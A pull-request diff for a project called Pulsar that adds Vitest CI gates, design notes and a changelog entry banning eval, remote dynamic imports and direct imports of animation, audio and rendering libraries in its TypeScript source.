### PR TITLE
Bundle PUL-Q007 + PUL-A001..PUL-A006 — runtime policy CI gates

### DIFF
--- a/changelog.d/46.added.md
+++ b/changelog.d/46.added.md
@@ -1,0 +1,30 @@
+### Added
+
+- Seven Vitest source-policy gates enforcing the runtime architectural
+  bans declared by PUL-Q007 and PUL-A001..PUL-A006. Each gate scans the
+  authored source tree on every `pnpm test` / CI run and fails the
+  build on any violation:
+  - PUL-Q007: no `eval`, `new Function`, `Function(...)` calls, or
+    dynamic `import()` of remote URLs / non-static specifiers in
+    `src/**/*.ts`.
+  - PUL-A001: no direct `gsap` imports from `src/scenes/**/*.ts`.
+  - PUL-A002: no direct `howler` imports and no
+    `new HTMLAudioElement()` / `new Audio()` constructions in
+    `src/scenes/**/*.ts`.
+  - PUL-A003: no PixiJS / Three.js / Phaser imports in the runtime-core
+    file set.
+  - PUL-A004: no Remotion or video-rendering-library imports in the
+    runtime-core file set.
+  - PUL-A005: every `CompositionManifest`-typed export under
+    `src/compositions/**/*.ts` is a static array literal of
+    string-literal scene ids; top-level imperative-dispatch shapes are
+    forbidden.
+  - PUL-A006: no reveal.js / Spectacle imports in the runtime-core
+    file set.
+- Shared scanner module at `tests/runtime/source-policy.ts` (file
+  walker, AST helpers, line-scoped exemption parser, import classifier,
+  import-ban matcher) so future policies plug in by adding a single
+  rule row.
+- Per-line exemption markers (`// PUL-<UID>-allow: <reason>`) honoured
+  by every gate, with empty / whitespace-only rationales and
+  markers-hidden-in-strings rejected.

--- a/docs/design/README.md
+++ b/docs/design/README.md
@@ -9,6 +9,9 @@ Design context for Pulsar. Source material for the ADRs in `../adrs/`.
 | [positioning-and-landscape.md](positioning-and-landscape.md) | Category, adjacent OSS projects, differentiation, strategic risks. |
 | [pul-p002-validation-ci-preflight.md](pul-p002-validation-ci-preflight.md) | Guardrails for gating pull-request CI on the canonical runtime validation pass. |
 | [pul-p003-adr-format-preflight.md](pul-p003-adr-format-preflight.md) | Guardrails for keeping ADR markdown and Ground Control ADR records aligned without duplicate schemas or workflow logic. |
+| [pul-a001-timeline-library-encapsulation-preflight.md](pul-a001-timeline-library-encapsulation-preflight.md) | Guardrails for statically enforcing scene timeline-library encapsulation through the runtime adapter and scene context. |
+| [pul-a002-a006-import-bans-preflight.md](pul-a002-a006-import-bans-preflight.md) | Cluster-level guardrails for the PUL-A002..A006 source-policy gates (audio, rendering, export, slide-framework bans plus the PUL-A005 declarative-manifest shape rule). |
+| [pul-q007-runtime-code-execution-preflight.md](pul-q007-runtime-code-execution-preflight.md) | Guardrails for statically banning runtime code execution outside the published bundle. |
 | [pul-f013-present-mode-preflight.md](pul-f013-present-mode-preflight.md) | Guardrails for implementing default `mode=present` behavior. |
 | [pul-f014-standalone-mode-preflight.md](pul-f014-standalone-mode-preflight.md) | Guardrails for implementing isolated `mode=standalone` behavior. |
 | [pul-f015-loop-mode-preflight.md](pul-f015-loop-mode-preflight.md) | Guardrails for implementing repeated `mode=loop` scene-timeline playback. |

--- a/docs/design/pul-a001-timeline-library-encapsulation-preflight.md
+++ b/docs/design/pul-a001-timeline-library-encapsulation-preflight.md
@@ -1,0 +1,122 @@
+# PUL-A001 Timeline Library Encapsulation Preflight
+
+Date: 2026-05-12
+
+PUL-A001 is a structural architecture policy: scene modules must not
+import the timeline library directly. Scenes construct timelines through
+the timeline utilities exposed on the scene context, currently
+`ctx.gsap`, so the runtime can keep GSAP behind ADR-003 / ADR-025's
+adapter boundary.
+
+The enforcement shape matches the PUL-Q007 static-policy gate: a
+Vitest source scan over authored runtime source, not a new scene schema,
+runtime validator, loader hook, or bundle audit.
+
+## Boundary
+
+- Scan authored scene source under `src/scenes/**/*.ts` for direct
+  imports or dynamic imports of `gsap` and GSAP subpaths.
+- Treat `src/runtime/timeline.ts` as the canonical GSAP boundary. It may
+  import `gsap`, exposes `createTimelineEngine()`, validates returned
+  timelines with `assertSceneTimeline()`, composes masters with
+  `composeMasterTimeline()`, and exports the `MasterTimeline` transport
+  surface.
+- Scene modules may read `ctx.gsap` after narrowing their local context
+  shape. They must not import `gsap`, instantiate a parallel timeline
+  engine, or reach into `gsap.core` directly.
+- Tests may import GSAP where they exercise the adapter boundary or
+  scene fixtures. The production policy is about scene modules.
+- Do not scan generated output, `dist/`, `coverage/`, docs, configs, or
+  package lockfiles unless a future requirement widens the source-policy
+  surface.
+- Exemptions, if unavoidable, must be line-scoped, reasoned, and named
+  for this policy (`PUL-A001-allow: <reason>`). A file-level scene
+  allowlist defeats the requirement.
+
+## Required Reuse
+
+Implementation must build on these incumbents:
+
+- Timeline boundary: `src/runtime/timeline.ts`,
+  `createTimelineEngine()`, `TimelineEngine`, `assertSceneTimeline()`,
+  `composeMasterTimeline()`, `MasterTimeline`, `sceneTimelineLabel()`,
+  and `parseSceneTimelineLabel()`.
+- Scene contract: `SceneModule`, `SceneLifecycleFn`, and
+  `assertSceneModule()` in `src/runtime/scene.ts`. Do not add a
+  second scene type just to express timeline-capable scenes.
+- Loader context wiring: `WorkbenchSceneCtx` and the loader / main-path
+  context builder that supplies `ctx.gsap` from `createTimelineEngine()`.
+- Source-policy scanner precedent:
+  `tests/runtime/screenshot-determinism-source.test.ts` for AST
+  traversal and diagnostics, plus `docs/design/pul-q007-runtime-code-
+  execution-preflight.md` for the shared forbidden-surface table seam.
+- CI gate style: Vitest under `tests/runtime/*`, reached by existing
+  `pnpm test` / `pnpm test:coverage` and `.github/workflows/ci.yml`.
+- Existing error/rendering surfaces: policy failures should be test
+  assertion failures with bounded file / line diagnostics, not runtime
+  `describeError()` envelopes or stage attributes.
+
+## Cross-Cutting Layers
+
+| Layer | Guardrail |
+|-------|-----------|
+| Source policy gate | The A001 ban belongs in the shared Vitest static-policy suite. It should reuse the Q007 scanner walker, exemption parser, and finding renderer rather than adding a second scanner. |
+| Scene schema gate | `assertSceneModule()` validates shape only. Do not add import-policy checks, package-specifier lists, or `FindingCode`s to scene validation. |
+| Timeline adapter | `src/runtime/timeline.ts` remains the only production module allowed to import `gsap`. Adapter tests may exercise it directly; scenes consume only `ctx.gsap` / runtime timeline utilities. |
+| Loader context | The implementation must preserve the existing `ctx.gsap` injection path. Do not create scene-local factories, globals, service locators, or fallback imports when `ctx.gsap` is absent. |
+| Build and dependency graph | Keep GSAP as the existing dependency in `package.json` / `pnpm-lock.yaml`. PUL-A001 does not add plugins, subpackages, bundler aliases, or tree-shaking exceptions. |
+| Auth, secrets, and env binding | No token, secret, env var, or config file is needed. The scan must not read credentials or accept policy from process env. |
+| OS/process exposure | The scan runs in-process under Vitest. Findings may report relative path, line, and import specifier; do not pass source snippets or policy state through shell argv. |
+| Error envelope | Runtime errors keep their current resolver / loader envelopes. A001 violations fail before boot as test diagnostics, not as scene navigation failures. |
+| Observability | CI failure output is sufficient. Do not add per-scene logging, telemetry, SARIF, artifacts, or a logging framework for this ban. |
+| Persistence | No persisted allowlist, cache, registry, or browser storage is required. |
+
+## Extensibility
+
+The seam is a parameterized forbidden-import policy table in the shared
+source scanner. A001 contributes a rule shaped like:
+
+- scope: `src/scenes/**/*.ts`;
+- forbidden module specifiers: `gsap` and `gsap/*`;
+- allowed production boundary: `src/runtime/timeline.ts`;
+- exemption tag: `PUL-A001-allow`.
+
+The same scanner should later accept A002 / A003 / A004 / A006 entries
+with different scopes and specifiers. Do not bake "timeline" into the
+walker, diagnostics, or exemption parser.
+
+If a future engine swap replaces GSAP, the source policy should update
+the forbidden specifier table and the adapter implementation, not scene
+modules. Scene authoring remains context-driven.
+
+## Gotchas And Anti-Patterns
+
+- Do not flag type-only imports from Pulsar runtime modules. The ban is
+  direct timeline-library imports from scenes, not imports of
+  `SceneModule` or context types.
+- Do not flag the string `gsap` in comments, docs, test names, labels,
+  or ordinary object keys. Use AST import / dynamic-import detection.
+- Do not allow `import('gsap')`, `import('gsap/Draggable')`, or computed
+  variants in scenes. A scene must not lazy-load around the boundary.
+- Do not let scenes import a local wrapper that itself imports GSAP
+  unless that wrapper is the runtime adapter boundary and scene-facing
+  access still arrives through context.
+- Do not create a second exception hierarchy, validation finding schema,
+  import resolver, package allowlist config, or runtime plugin system.
+- Do not conflate scene-local optional rendering libraries with the
+  timeline engine. A003 owns PixiJS / Three.js / Phaser policy.
+- Do not use this requirement to forbid GSAP in adapter tests or to
+  remove the existing runtime dependency.
+
+## Non-Goals
+
+PUL-A001 does not change scene metadata, composition manifests, URL
+grammar, timeline label grammar, master-timeline transport, audio APIs,
+asset policy, dependency versions, CI workflow topology, logging,
+persistence, or runtime error classification.
+
+It does not implement the A002-A006 bans, transition requirement
+status, create traceability links, or rewrite scene timelines. The
+implementation should only add the structural policy gate and tests
+needed to prove scene modules cannot import the timeline library
+directly.

--- a/docs/design/pul-a002-a006-import-bans-preflight.md
+++ b/docs/design/pul-a002-a006-import-bans-preflight.md
@@ -1,0 +1,127 @@
+# PUL-A002..A006 Import Bans Preflight
+
+Date: 2026-05-12
+
+PUL-A002, PUL-A003, PUL-A004, and PUL-A006 share PUL-A001's shape: a
+structural source-policy gate that flags forbidden module specifiers
+in a given file scope. PUL-A005 (composition declarativeness) is the
+one outlier in this bundle; it reuses the shared scanner's AST helpers
+and exemption parser but supplies its own decision rule. This note
+captures the cluster-level guardrails so each per-requirement test
+file inherits a single source of truth.
+
+The PUL-A001 preflight authorises this inheritance explicitly:
+
+> The seam is a parameterized forbidden-import policy table in the
+> shared source scanner. A001 contributes a rule shaped like:
+> scope, forbidden module specifiers, allowed production boundary,
+> exemption tag. The same scanner should later accept A002 / A003 /
+> A004 / A006 entries with different scopes and specifiers. Do not
+> bake "timeline" into the walker, diagnostics, or exemption parser.
+
+## Per-requirement table
+
+| Req | Scope (file set) | Forbidden specifiers | Allowed boundary | Exemption tag |
+|-----|------------------|----------------------|------------------|---------------|
+| PUL-A002 | `src/scenes/**/*.ts` | `howler`, `howler/*` (+ `new Audio()` / `new HTMLAudioElement()` value-position) | `src/runtime/audio.ts` (out of scope) | `PUL-A002-allow` |
+| PUL-A003 | `src/**/*.ts` minus `src/scenes/**` (runtime-core file set) | `pixi.js`, `pixi.js/*`, `three`, `three/*`, `phaser`, `phaser/*` | scene-local imports under `src/scenes/**` | `PUL-A003-allow` |
+| PUL-A004 | `src/**/*.ts` minus `src/scenes/**` (runtime-core file set) | `remotion`, `remotion/*`, `@remotion/*` | export pipeline (separate codebase, ADR-006) | `PUL-A004-allow` |
+| PUL-A005 | `src/compositions/**/*.ts` | (special: declarative-manifest shape; see below) | n/a | `PUL-A005-allow` |
+| PUL-A006 | `src/**/*.ts` minus `src/scenes/**` (runtime-core file set) | `reveal.js`, `reveal.js/*`, `spectacle`, `spectacle/*`, `@spectacle/*` | companion projects (separate, ADR-001) | `PUL-A006-allow` |
+
+The "runtime-core file set" is computed at scan time as
+`walkTsFiles(SRC_ROOT)` filtered to exclude `src/scenes/`. This makes
+the scope self-extending: a new top-level runtime module (e.g.,
+`src/feature-flags.ts`) is picked up automatically.
+
+## Required Reuse
+
+Each test file MUST build on these incumbents (defined in
+`tests/runtime/source-policy.ts`):
+
+- `walkTsFiles(root, excludes?)` — the file walker.
+- `parseSource(text, file)` — TypeScript `SourceFile` factory with
+  parent pointers populated.
+- `collectLineExemptions(sourceFile, allowTag)` — line-scoped
+  exemption parser. A marker hidden inside a string literal is not
+  honoured; empty or whitespace-only rationales are rejected.
+- `scanImportSpecifiers(sourceFile, rule, exempted)` — the import-ban
+  scanner. Handles static imports, dynamic `import(...)`,
+  `import type ... from 'x'`, `export ... from 'x'`, and
+  `import x = require('y')`. Type-only imports are flagged because
+  the specifier is still surfaced into scene authoring.
+- `unwrap(node)` and `isInTypePosition(node)` — for the policies that
+  need value-position vs type-position discrimination (PUL-A002's
+  `HTMLAudioElement` constructor check; PUL-Q007's `eval` / `Function`
+  detector).
+
+## Cross-Cutting Layers (same as PUL-A001 preflight)
+
+Each policy MUST:
+
+- Live in a Vitest source scan under `tests/runtime/`. Fail through
+  the existing `pnpm test` / CI `test` job. No separate workflow
+  controller, no second package manager path, no advisory-only mode.
+- Emit findings as `{ file, line (1-based), text (trimmed), label }`
+  records. Never dump AST nodes, full files, registry objects, scene
+  objects, captions, cookies, headers, env, or argv.
+- Run in-process under Vitest. No HTTP, no FS writes, no env reads
+  beyond what `process.argv`-free Vitest already provides.
+- Use ASCII-only diagnostic text so CI logs render uniformly.
+
+## PUL-A005 Specifics
+
+PUL-A005 is not an import ban; it is a structural-shape requirement
+on every exported `CompositionManifest`-typed binding under
+`src/compositions/**/*.ts`. The detection rule is two-phase:
+
+1. **Top-level statement shape.** A composition module's top-level
+   statements MUST be import declarations, export declarations, type
+   aliases, interface declarations, or `const`-only variable
+   statements. Top-level `if` / `switch` / `for` / `while` / function
+   declarations / mutable `let` declarations / expression statements
+   are imperative-dispatch shapes and are forbidden.
+2. **Manifest-binding shape.** For every variable declaration whose
+   type annotation references `CompositionManifest`, the initializer
+   MUST be an `ArrayLiteralExpression` whose elements are all
+   `StringLiteral` or `NoSubstitutionTemplateLiteral` nodes. A
+   conditional expression, a function call, a runtime-mutable
+   identifier reference, a substituted template literal, or a spread
+   expression is forbidden.
+
+This intentionally rejects the otherwise-tempting "extract a const
+helper for the manifest" pattern. The exemption marker
+`// PUL-A005-allow: <reason>` is available when a real composition
+needs an indirection (e.g., a single source-of-truth for the
+placeholder scene id shared between the workbench and a fixture); the
+absence of a relaxation knob is intentional, so the structural rule
+stays sharp.
+
+## Gotchas And Anti-Patterns
+
+- Do not regex-scan for module specifiers. Use the TypeScript AST
+  through `scanImportSpecifiers`. The same package name in a comment,
+  string literal, identifier, or JSDoc reference is not an import.
+- Do not allow a wrapper module (`./shims/gsap.ts`) that itself imports
+  the forbidden package to silently bridge scenes to the library. The
+  wrapper is the violation; only the named runtime adapter is allowed.
+- Do not add a runtime plugin system, import allowlist config, CSP
+  generator, dependency audit, or bundle inspector for these gates.
+  The policy is structural, not lifecycle-bound.
+- Do not relax exemption-marker line scoping. A file-scoped allowlist
+  defeats the requirement.
+- Do not introduce a second exception hierarchy, FindingCode, or
+  validation surface for these policies. Source policy stays separate
+  from `validateRuntime()`.
+
+## Non-Goals
+
+This bundle does not change scene metadata, composition manifests
+(beyond confirming their shape), URL grammar, lifecycle ordering,
+audio/timeline APIs, asset policy, runtime error classification,
+dependency versions, CI workflow topology, logging, or persistence.
+
+It does not promote any of PUL-A001..PUL-A006 to ACTIVE outside the
+`/implement` transition step, create traceability links outside the
+reconciliation step, or rewrite the existing placeholder scene or
+default composition (both are already compliant by construction).

--- a/docs/design/pul-q007-runtime-code-execution-preflight.md
+++ b/docs/design/pul-q007-runtime-code-execution-preflight.md
@@ -1,0 +1,114 @@
+# PUL-Q007 Runtime Code Execution Preflight
+
+Date: 2026-05-12
+
+PUL-Q007 is a runtime-source security policy: published runtime code
+must not execute code that is not already present in the bundle. The
+right enforcement is a Vitest static-policy suite over `src/**/*.ts`,
+using the TypeScript AST scanner precedent from
+`tests/runtime/screenshot-determinism-source.test.ts` and the CI-gate
+precedent from `tests/runtime/workbench-graph.test.ts`.
+
+This is not a new runtime validator. `src/runtime/validation.ts`
+validates scene and composition declarations. Q007 validates source
+structure before build output exists.
+
+## Boundary
+
+- Scan authored runtime source under `src/`: `src/runtime`,
+  `src/scenes`, `src/compositions`, `src/main.ts`, and
+  `src/workbench-graph.ts`.
+- Detect runtime-value uses of `eval`, `new Function`, `Function(...)`,
+  dynamic `import(...)` whose specifier is a remote URL or not
+  statically local, and equivalent indirect spellings that execute
+  string or remote code.
+- Use the TypeScript compiler API. Do not add regex-only scanning,
+  bundle parsing, browser execution, Vite server startup, or lifecycle
+  invocation.
+- Tests, docs, configs, generated artifacts, `dist/`, and `coverage/`
+  are out of scope unless a future requirement explicitly widens the
+  policy.
+- Exemptions, if unavoidable, must be line-scoped, reasoned, and named
+  for this policy (`PUL-Q007-allow: <reason>`). A broad file-level
+  allowlist is a policy bypass.
+
+## Required Reuse
+
+Implementation must build on these incumbents:
+
+- AST scan shape, file walker, rooted access-path matching, alias
+  handling, wrapper unwrapping, same-line exemption parsing, and
+  fail-loud Vitest reporting from
+  `tests/runtime/screenshot-determinism-source.test.ts`.
+- Repository-wide CI gate style from
+  `tests/runtime/workbench-graph.test.ts`: deterministic findings,
+  direct source paths and line numbers, and no advisory-only mode.
+- Toolchain and workflow surface from ADR-009: Node 22, pnpm 9.15,
+  Vitest, TypeScript strict mode, Biome, and the existing `pnpm test`
+  / CI `test` job. Do not create a second workflow controller or a
+  new package manager path.
+- Runtime architectural boundaries from ADR-008 and ADR-009:
+  declarative manifests over flow control, library encapsulation, and
+  no remote or ambient runtime discovery as an authoring primitive.
+
+## Cross-Cutting Layers
+
+| Layer | Guardrail |
+|-------|-----------|
+| Source policy gate | Q007 lives in a Vitest source scan under `tests/runtime/`. It must fail CI through the existing `pnpm test` / `pnpm test:coverage` path. |
+| Runtime validation | Do not add a Q007 `FindingCode` or teach `validateRuntime()` to parse source. The validation pass remains scene/composition metadata validation. |
+| Asset and URL policy | Do not conflate remote code with assets. Asset URLs remain governed by `scene.assets`, `resolveAssetUrl()`, and `DEFAULT_ALLOWED_SCHEMES`; Q007 must not fetch URLs, probe redirects, or reinterpret asset allowlists as code-import allowlists. |
+| Build and module graph | Do not depend on Vite output, sourcemaps, minified bundles, or browser execution. The authored source tree is the canonical inspectable surface. |
+| Auth, secrets, and env binding | The scan needs no tokens, env vars, or repository secrets. Do not pass source snippets, URLs with credentials, or config through process argv. |
+| OS/process exposure | The scan runs in-process under Vitest. Findings may report relative file path, line, label, and trimmed line text only. |
+| Error envelope | Fail with bounded diagnostic text. Do not dump AST nodes, full files, registry objects, scene objects, captions, cookies, headers, env, or argv. Reuse `describeError()` only if unknown thrown values need rendering. |
+| Observability | CI failure output is enough. Do not add telemetry, SARIF, artifacts, or logging infrastructure. |
+| Persistence | No persistence is required. Do not write scan results to repo files or caches. |
+
+## Extensibility
+
+The seam is the forbidden-surface table plus matcher functions. Keep
+the scanner generic enough that the A-series import bans can add
+policy tables for forbidden import specifiers and forbidden
+constructors without duplicating the file walker, exemption parser, or
+diagnostic envelope.
+
+Remote-import classification belongs in one helper that accepts the
+static import specifier expression and answers whether it is:
+
+- local static module path (`./`, `../`, package specifier) - allowed
+  for Q007;
+- remote absolute URL (`http:`, `https:`, protocol-relative) -
+  forbidden;
+- non-literal / computed / template with expressions - forbidden
+  unless a future requirement defines a narrower local-only grammar.
+
+## Gotchas And Anti-Patterns
+
+- Do not rely on text search for `eval` or `Function`; comments,
+  strings, type positions, property names, and local shadowing need
+  AST treatment.
+- Do not flag static local `import` declarations or local package
+  imports. Q007 is about runtime code execution not present in the
+  bundle, not normal ESM dependencies.
+- Do not permit `import(specifier)` where `specifier` is computed,
+  read from metadata, read from URL params, read from env, or built
+  from a remote origin. That creates a surprise execution path even if
+  today's value happens to be local.
+- Do not create a scene loader plugin system, import allowlist config,
+  runtime code-signing path, CSP generator, or dependency audit here.
+- Do not move policy into runtime lifecycle hooks. A violating source
+  file must fail before boot.
+- Do not broaden GitHub permissions or add secrets for this gate.
+- Do not make the gate advisory; any finding is a test failure.
+
+## Non-Goals
+
+PUL-Q007 does not change scene metadata, composition manifest shape,
+asset scheme policy, URL navigation grammar, lifecycle ordering,
+audio/timeline APIs, exception hierarchy, logging, persistence,
+dependency scanning, CSP header generation, or bundle auditing.
+
+It does not transition the requirement status, create traceability
+links, implement the A-series import bans, or add a public CLI/report
+format.

--- a/tests/runtime/policy-a001-timeline-encapsulation.test.ts
+++ b/tests/runtime/policy-a001-timeline-encapsulation.test.ts
@@ -59,6 +59,8 @@ describe('PUL-A001 — timeline library encapsulation (source scan)', () => {
       ["import type { Tween } from 'gsap';", '(type-only import)'],
       ["export { gsap } from 'gsap';", '(re-export)'],
       ["export * from 'gsap';", '(re-export)'],
+      ["import gsap = require('gsap');", '(import equals require)'],
+      ["import gsap = require('gsap/Draggable');", '(import equals require)'],
     ])('flags `%s` %s', (source, suffix) => {
       const findings = scanForA001(source, 'src/scenes/x.ts');
       expect(findings).toHaveLength(1);

--- a/tests/runtime/policy-a001-timeline-encapsulation.test.ts
+++ b/tests/runtime/policy-a001-timeline-encapsulation.test.ts
@@ -1,0 +1,222 @@
+import { readFileSync, statSync } from 'node:fs';
+import { join, relative } from 'node:path';
+import { describe, expect, it } from 'vitest';
+
+import {
+  type ImportBanRule,
+  REPO_ROOT,
+  SRC_ROOT,
+  type SourceFinding,
+  collectLineExemptions,
+  parseSource,
+  scanImportSpecifiers,
+  walkTsFiles,
+} from './source-policy';
+
+// PUL-A001 — Timeline library encapsulation.
+//
+// Statement: "Scene modules SHALL NOT import the timeline library
+// directly. Scene timelines SHALL be constructed via the timeline
+// utilities exposed on the scene context."
+//
+// Enforcement: a Vitest source scan over `src/scenes/**/*.ts` that
+// flags every import — static (`import ... from 'gsap'`), dynamic
+// (`import('gsap')`), and type-only (`import type ... from 'gsap'`) —
+// of the `gsap` package and its subpaths. The runtime adapter at
+// `src/runtime/timeline.ts` is the ONLY production module allowed to
+// import GSAP; it is outside the scene scope so the scan never sees
+// it. Scenes consume the timeline engine via `ctx.gsap`.
+//
+// Exemption: a line-scoped `// PUL-A001-allow: <reason>` marker
+// excludes a single line. Empty / whitespace-only rationales are
+// rejected; markers hidden inside string literals are rejected.
+
+const RULE: ImportBanRule = {
+  label: 'gsap (scene module imports timeline library directly)',
+  specifiers: ['gsap', 'gsap/'],
+  boundaries: [],
+  allowTag: 'PUL-A001-allow',
+};
+
+const SCENES_ROOT = join(SRC_ROOT, 'scenes');
+
+function scanForA001(source: string, file: string): readonly SourceFinding[] {
+  const sf = parseSource(source, file);
+  const exempted = collectLineExemptions(sf, RULE.allowTag);
+  return scanImportSpecifiers(sf, RULE, exempted);
+}
+
+describe('PUL-A001 — timeline library encapsulation (source scan)', () => {
+  describe('scanner self-tests', () => {
+    it.each([
+      ["import { gsap } from 'gsap';", '(static import)'],
+      ["import gsap from 'gsap';", '(static import)'],
+      ["import * as gsap from 'gsap';", '(static import)'],
+      ["import { Draggable } from 'gsap/Draggable';", '(static import)'],
+      ["import 'gsap/all';", '(static import)'],
+      ["await import('gsap');", '(dynamic import)'],
+      ["await import('gsap/Draggable');", '(dynamic import)'],
+      ["import type { Tween } from 'gsap';", '(type-only import)'],
+      ["export { gsap } from 'gsap';", '(re-export)'],
+      ["export * from 'gsap';", '(re-export)'],
+    ])('flags `%s` %s', (source, suffix) => {
+      const findings = scanForA001(source, 'src/scenes/x.ts');
+      expect(findings).toHaveLength(1);
+      expect(findings[0]?.label).toBe(`${RULE.label} ${suffix}`);
+    });
+
+    it('does NOT flag scenes that read `ctx.gsap` (the canonical path)', () => {
+      const src = [
+        'import type { WorkbenchSceneCtx } from "../runtime/scene-loader";',
+        'export const timeline = (ctx: WorkbenchSceneCtx) => ctx.gsap.timeline();',
+      ].join('\n');
+      const findings = scanForA001(src, 'src/scenes/example.ts');
+      expect(findings).toEqual([]);
+    });
+
+    it('does NOT flag a local identifier named `gsap`', () => {
+      const src = 'const gsap = { timeline: () => null }; gsap.timeline();';
+      expect(scanForA001(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('does NOT flag `gsap` in a comment or string literal', () => {
+      const src = "// gsap is forbidden in scenes\nconst note = 'gsap';";
+      expect(scanForA001(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('does NOT flag a similarly-named package (whole-specifier match)', () => {
+      const src = "import { thing } from 'gsap-like-name';";
+      expect(scanForA001(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('honors `// PUL-A001-allow: <reason>` exemption on the import line', () => {
+      const src =
+        "import { gsap } from 'gsap'; // PUL-A001-allow: see ADR-XYZ — adapter-bridging fixture";
+      expect(scanForA001(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('rejects an empty exemption rationale', () => {
+      const src = "import { gsap } from 'gsap'; // PUL-A001-allow:";
+      expect(scanForA001(src, 'src/scenes/x.ts')).toHaveLength(1);
+    });
+
+    it('reports the import line and the trimmed source text', () => {
+      const src = ['// header', '', "import { gsap } from 'gsap';"].join('\n');
+      const findings = scanForA001(src, 'src/scenes/example.ts');
+      expect(findings).toHaveLength(1);
+      expect(findings[0]?.file).toBe('src/scenes/example.ts');
+      expect(findings[0]?.line).toBe(3);
+      expect(findings[0]?.text).toBe("import { gsap } from 'gsap';");
+    });
+
+    it('the shared `boundaries` escape hatch suppresses findings for files inside the boundary', () => {
+      // The repo-level PUL-A001 rule does not use `boundaries` (the
+      // adapter is excluded by file scope instead). This test exercises
+      // the shared `scanImportSpecifiers` boundary behaviour directly
+      // so a future caller that does supply a boundary list gets the
+      // documented contract — and a regression in the shared helper is
+      // caught here regardless of how the per-policy rules scope their
+      // files.
+      const ruleWithBoundary: ImportBanRule = {
+        ...RULE,
+        boundaries: ['src/runtime/timeline.ts'],
+      };
+      const sf = parseSource(
+        "import { gsap } from 'gsap';",
+        join(SRC_ROOT, 'runtime', 'timeline.ts'),
+      );
+      const exempted = collectLineExemptions(sf, ruleWithBoundary.allowTag);
+      const findings = scanImportSpecifiers(sf, ruleWithBoundary, exempted);
+      expect(findings).toEqual([]);
+    });
+
+    it('the shared `boundaries` escape hatch does NOT suppress findings outside the boundary', () => {
+      const ruleWithBoundary: ImportBanRule = {
+        ...RULE,
+        boundaries: ['src/runtime/timeline.ts'],
+      };
+      const sf = parseSource(
+        "import { gsap } from 'gsap';",
+        join(SRC_ROOT, 'scenes', 'example.ts'),
+      );
+      const exempted = collectLineExemptions(sf, ruleWithBoundary.allowTag);
+      const findings = scanImportSpecifiers(sf, ruleWithBoundary, exempted);
+      expect(findings).toHaveLength(1);
+    });
+
+    it('a directory `boundaries` entry suppresses findings for every file under it', () => {
+      const ruleWithBoundary: ImportBanRule = {
+        ...RULE,
+        boundaries: ['src/runtime/'],
+      };
+      for (const rel of ['runtime/timeline.ts', 'runtime/audio.ts']) {
+        const sf = parseSource("import { gsap } from 'gsap';", join(SRC_ROOT, rel));
+        const exempted = collectLineExemptions(sf, ruleWithBoundary.allowTag);
+        expect(scanImportSpecifiers(sf, ruleWithBoundary, exempted)).toEqual([]);
+      }
+    });
+
+    it('the `boundaries` check accepts a repo-relative file path (not just an absolute one)', () => {
+      // The runtime-tree assertions in every per-policy test build
+      // `SourceFile`s with repo-relative names so diagnostics print
+      // `src/runtime/x.ts` instead of an absolute path. The boundary
+      // check has to accept that input shape — otherwise the documented
+      // adapter escape hatch fails the first time a real caller wires
+      // a boundary into a production scan.
+      const ruleWithBoundary: ImportBanRule = {
+        ...RULE,
+        boundaries: ['src/runtime/timeline.ts'],
+      };
+      const sf = parseSource("import { gsap } from 'gsap';", 'src/runtime/timeline.ts');
+      const exempted = collectLineExemptions(sf, ruleWithBoundary.allowTag);
+      expect(scanImportSpecifiers(sf, ruleWithBoundary, exempted)).toEqual([]);
+    });
+
+    it('the `boundaries` check correctly excludes a repo-relative file path that is OUTSIDE the boundary', () => {
+      const ruleWithBoundary: ImportBanRule = {
+        ...RULE,
+        boundaries: ['src/runtime/timeline.ts'],
+      };
+      const sf = parseSource("import { gsap } from 'gsap';", 'src/scenes/x.ts');
+      const exempted = collectLineExemptions(sf, ruleWithBoundary.allowTag);
+      expect(scanImportSpecifiers(sf, ruleWithBoundary, exempted)).toHaveLength(1);
+    });
+  });
+
+  describe('runtime tree (current code revision)', () => {
+    it('scenes root `src/scenes/` exists and contains at least one .ts file', () => {
+      expect(statSync(SCENES_ROOT).isDirectory()).toBe(true);
+      expect(walkTsFiles(SCENES_ROOT).length).toBeGreaterThan(0);
+    });
+
+    it('contains no A001 violations across `src/scenes/**/*.ts`', () => {
+      const files = walkTsFiles(SCENES_ROOT);
+      const findings: SourceFinding[] = [];
+      for (const file of files) {
+        const text = readFileSync(file, 'utf-8');
+        const rel = relative(REPO_ROOT, file);
+        const sf = parseSource(text, rel);
+        const exempted = collectLineExemptions(sf, RULE.allowTag);
+        findings.push(...scanImportSpecifiers(sf, RULE, exempted));
+      }
+      const header =
+        'PUL-A001 forbids scene modules from importing `gsap` / `gsap/*` directly. Construct scene timelines via `ctx.gsap` (the runtime adapter at `src/runtime/timeline.ts`). Add a `// PUL-A001-allow: <reason>` exemption on the same line only as a last resort.';
+      const detail = findings.map((f) => `  ${f.file}:${f.line}  ${f.label}  ${f.text}`).join('\n');
+      const message = findings.length === 0 ? '' : `${header}\n${detail}`;
+      expect(findings, message).toEqual([]);
+    });
+
+    it('runtime adapter `src/runtime/timeline.ts` is exempt by scope (the boundary)', () => {
+      // The scope is `src/scenes/**/*.ts`, so the adapter never enters
+      // the scan — it would never be flagged even though it imports
+      // `gsap`. This test pins that property explicitly so a future
+      // change to the scope cannot silently drag the adapter in.
+      const adapter = join(SRC_ROOT, 'runtime', 'timeline.ts');
+      expect(statSync(adapter).isFile()).toBe(true);
+      const text = readFileSync(adapter, 'utf-8');
+      expect(text).toMatch(/from\s+['"]gsap['"]/);
+      const sceneFiles = walkTsFiles(SCENES_ROOT);
+      expect(sceneFiles).not.toContain(adapter);
+    });
+  });
+});

--- a/tests/runtime/policy-a002-audio-encapsulation.test.ts
+++ b/tests/runtime/policy-a002-audio-encapsulation.test.ts
@@ -260,10 +260,18 @@ describe('PUL-A002 — audio library encapsulation (source scan)', () => {
       expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
     });
 
+    // Every entry in `GLOBAL_WRAPPERS` (`globalThis`, `window`, `self`,
+    // `global`) appears at least once below so a regression that drops
+    // one wrapper from the set fails here. `global.Audio()` /
+    // `new global.HTMLAudioElement()` are the Node.js-adjacent bypass
+    // shapes a developer in a Node-side script could otherwise use to
+    // slip past the scene-side audio ban while every other test stayed
+    // green.
